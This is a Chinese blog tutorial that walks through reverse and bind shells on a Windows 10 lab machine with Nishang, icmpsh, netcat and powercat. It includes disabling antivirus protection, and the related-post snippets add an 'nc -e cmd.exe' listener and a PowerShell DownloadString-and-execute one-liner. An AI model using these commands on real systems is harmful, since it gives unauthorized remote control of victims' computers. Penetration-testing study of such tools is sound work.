nishang反弹shell多种方式攻击——win10

最新推荐文章于 2024-04-26 10:43:01 发布
最新推荐文章于 2024-04-26 10:43:01 发布
阅读量1k 收藏 4
点赞数 1
分类专栏: 精密还原案发现场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45625605/article/details/103056458
版权

一、nishang时基于powershell的渗透测试工具,需要powershell的版本达到3.0及以上。推荐win10版本电脑或windowsserver2008以上版本服务器

1、win10上直接以管理员身份运行

2、运行后开始导入nishang框架,导入前需先下载nishang。下载地址:https://github.com/samratashok/nishang(由于win10自带杀毒,下载时需要关闭实时防护)

进入文件前首先运行 set-executionpolicy unrestricted     选择y

进入到解压的nishang文件下,运行import-module ./nishang.psm1,会出现以下问题,证明文件没有丢失。

确认可继续执行Get-Command -Module nishang ,查看文件

这时候环境已经搭好,这时候需要去kali里搭建利用。

二、icmp反弹shell

1、icmp简单介绍:

       使用ICMP协议最常见的就是ping工具,在ping www.baidu.com的时候可以看到,ICMP协议是典型的一问一答模式,本机向百度服务器发送ICMP请求包,如果请求包成功到达目的地,百度服务器则回应ICMP响应包。

       ICMP(Internet Control Message Protocol)是IPv4协议族中的一个子协议,用于IP主机、路由器之间传递控制消息。控制消息是在网络通不通、主机是否可达、路由是否可用等网络本身的消息。

2、漏洞利用

   kali里安装icmpsh工具。  https://github.com/inquisb/icmpsh.git

   

  进入kali中icmpsh目录下,输入命令sysctl -w net.ipv4.icmp_echo_ignore_all=1来禁止ICMP回显。(这步可忽略)

    python icmpsh_m.py 192.168.230 192.168.0.149   或者

   ./icmpsh_m.py 192.168.0.230 192.168.0.149来启动监听(第一个ip是kali的,后面一个是搭建环境windows的ip)

   提示:实现icmp反弹shell虚拟机必须换成桥接模式,下面的几种方式啥都可以。

    

    接下来去powershell里执行:Invoke-PowerShellIcmp -IPAddress 192.168.0.230

    

    这时kali里就会反弹回shell

    

    这时就拿到了权限,接下来你就自己操作,如windows系统操作一样。

 三、 TCP shell

    1、kali不需要下载任何东西直接执行

         nc -lvp 4444  (监听端口,端口可随意更改)

         直接powershell里执行Invoke-PowerShellTcp -Reverse -IPAddress 192.168.197.128  -Port 4444   

         

         

四、Bind shell

   powershell直接执行:

    Invoke-PowerShellTcp.ps1

    Invoke-PowerShellTcp -Bind -Port 8888

    kali里写

   . .powercat.ps1

   powercat -c ip -v -p 8888  (ip是搭建环境系统的ip)

  

 参考链接:www.sohu.com/a/235697862_609556

 

Stephen Wolf
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【渗透笔记】windows反弹shell方法大全
白菜猪肉炖粉条
01-06 1852
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。 反向shell反弹shell): 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口 被占用等问题导致被控端不能正常接收发送过来的数据包。 nc nc正向shell 被控端: nc -lvvp 6666 -e cmd.exe 开启监听 控制端: nc 192.168.1.62 6666 此原理就是,被控端将cmd.exe重定向到本地的6666端口,控制端主动连接被控端的6666端口,即可获得sh
我眼中的nishangICMP反弹shell攻击
ovowovo的博客
11-29 416
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 在这里插入图片描述 2.用...
Windows反弹Shell
最新发布
qq_62073002的博客
04-26 716
正向shell: 控制端主动发起连接请求去连接被控制端,中间网络链路不存在阻碍。反向shell(反弹shell)︰ 被控端主动发起连接请求去连接控制端,通常被控端由于防火墙限制、权限不足、端口被占用等问题导致被控端不能正常接收发送过来的数据包。靶机:win11攻击机:vps。
nishangICMP反弹shell攻击
wodepzw的博客
11-19 288
准备 靶机Windows10 IP 192.168.0.164 攻击机kali IP 192.168.0.159 靶机下载好nishang 下载链接https://github.com/samratashok/nishang 攻击机下载好icmpsh 下载链接https://github.com/inquisb/icmpsh.git 1.先查看两个机子是否能ping通 2.用管理员权限打开powe...
nishangICMP反弹shell攻击日志分析
weixin_44253823的博客
11-08 639
ICMP包一般不被防火墙拦截,使用ICMP协议作为连接容易通过防火墙。 攻击过程复现。 复现环境 win7:192.168.0.73。powershell导入nishang框架。https://blog.csdn.net/weixin_44253823/article/details/102972355 kali:192.168.0.162。安装icmpsh工具。 https://gi...
反弹shell的方法总结(base64绕过等等)
weixin_50464560的博客
04-01 8500
前言 什么是反弹shell(reverse shell)? 就是控制端监听某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么需要反弹shell反弹shell通常用于被控端因防火墙受限、权限不足、端口被占用等情形。在渗透过程中,往往因为端口限制而无法直连目标机器,此时需要通过反弹shell来获取一个交互式shell,以便继续深入。以下详细介绍Win
nishang, Nishang PowerShell测试和攻击性安全.zip
09-18
nishang, Nishang PowerShell测试和攻击性安全 Nishang是一个框架和脚本,它允许使用PowerShell安全性。穿透测试和红色组合的脚本。 在渗透测试的所有阶段,Nishang都是有用的。按 nikhil_mitt用法导入当前...
Nishang2022最新可用版本,稳定
06-28
Nishang是一个PowerShell攻击框架,它是Powershell攻击脚本和有效载荷的一个集合,Nishang被广泛应用于渗透测试的各个阶段 NiShang目录介绍 ActiveDirectory:活动目录 Antak-Webshell:在内存中执行PowerShell脚本,...
nishangNishang-用于红队,渗透测试和进攻安全的进攻性PowerShell
02-05
2. **多功能性**:Nishang包含多种功能,如枚举系统信息、收集密码、远程执行代码、持久化机制、反取证技术等,这些都是攻击者在入侵过程中可能需要的。 3. **模块化**:Nishang的结构是模块化的,用户可以根据需要...
NiShang.7z
09-05
NiShang.7z】是一个Java Web项目,主要用于实现一个服装商城的在线平台。这个项目采用的技术栈主要包括Servlet和JSP,它们是Java Web开发中的核心组件,用于构建动态网站应用。Servlet是Java编写的服务器端程序,...
公众号和小程序的java源码-nishang:Nishang-用于渗透测试和攻击性安全的PowerShell。https://github.c
06-06
进行攻击性安全、渗透测试和红队。 Nishang 在渗透测试的所有阶段都很有用。 经过 用法 导入当前 PowerShell 会话中的所有脚本(PowerShell v3 以上)。 PS C:\nishang> 导入模块 .\nishang.psm1 使用带有点源的单个...
cmd反弹shell提权
10-24
cmd反弹shell提权
PowerShell攻防进阶篇:nishang工具用法详解
weixin_33795806的博客
09-14 916
本文讲的是PowerShell攻防进阶篇:nishang工具用法详解, 1.简介 Nishang是一款针对PowerShell的渗透工具。说到渗透工具,那自然便是老外开发的东西。国人开发的东西,也不是不行,只不过不被认可罢了。不管是谁开发的,既然跟渗透有关系,那自然是对我们有帮助的,学习就好。来源什么的都不重要。总之,nishang也是一款不可多得的好...
Windows的几种常用反弹shell方法
热门推荐
hackzkaq的博客
02-21 1万+
零基础学黑客,搜索公众号:白帽子左一 简介:shell类似于DOS下的COMMAND.COM和后来的cmd.exe,它接收用户命令,然后调用相应的应用程序,也可以通俗的说是命令执行环境。分为交互式shell,与非交互式shell。 交互shell就是shell等待你的输入,并且立即执行你提交的命令,这种模式被称作交互式是因为shell与用户进行交互。 非交互shell不会与用户进行交互,而是用户读取存放在文件中的命令或者输入的命令,并且执行它们。当它读到文件的结尾,shell也就终止了。 1.nc反弹sh
Windows系统反弹shell常见方法总结
Bird&Bird
07-17 3339
目录一、Powercat反弹shell二、Nishang反弹shell三、UDP反弹shell四、Metasploit反弹shell五、nc反弹 一、Powercat反弹shell powercat下载: powercat. powercat 是一个 函数。首先,需要先加载该函数,然后才能执行它。加载方式有两种: 其一:下载powercat.ps1至本地,并加载 其二:从URL加载 powershell IEX (New-Object System.Net.Webclient).DownloadStri
[笔记]Windows安全之《一》反弹Shell
二次元怪兽的博客
04-01 1870
powershell反弹shell常见方式 文章目录正向连接和反向连接(反弹连接)PowerShell的配置常见的反弹Shell总结 正向连接和反向连接(反弹连接) PowerShell的配置 常见的反弹Shell 总结
shell编程学习】反弹shell
yuxuan89814的专栏
05-23 784
反弹shell实验及命令解析
渗透测试-window反弹shell
lza20001103的博客
05-11 4238
window反弹shell
Nishang工具的介绍和基本使用
菜鸟-宇的个人博客
10-03 163
是一个脚本和有效负载的框架和集合,支持使用PowerShell进行攻击性安全、渗透测试和红色团队。Nishang集成了框架、脚本和各种Payload,包括了下载和执行、键盘记录、DNS、延时命令等脚本在渗透测试的所有阶段都很有用。
windows反弹shell方法
09-21
Windows反弹shell多种方法,其中包括Powercat反弹shellNishang反弹shell和使用邮件地址作为反弹shell的服务器地址。 Powercat反弹shell是一种通过PowerShell实现的方法。攻击者可以在目标机器的cmd中执行命令,通过下载Powercat脚本并使用它来建立反弹shell连接。具体的命令如下: ```powershell powershell IEX (New-Object System.Net.Webclient).DownloadString('http://192.168.8.14/powercat.ps1');powercat -c 192.168.110.128 -p 6677 -e cmd ``` Nishang反弹shell是另一种常用的方法。它提供了一组用于渗透测试的PowerShell脚本,其中包括反弹shell的功能。攻击者可以使用Nishang脚本来建立反弹shell连接。 另外,还可以使用邮件地址作为反弹shell的服务器地址。这种方法适用于Windows系统,可以在编译时选择隐藏弹出窗口。具体实现的细节需要根据具体情况进行进一步研究。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值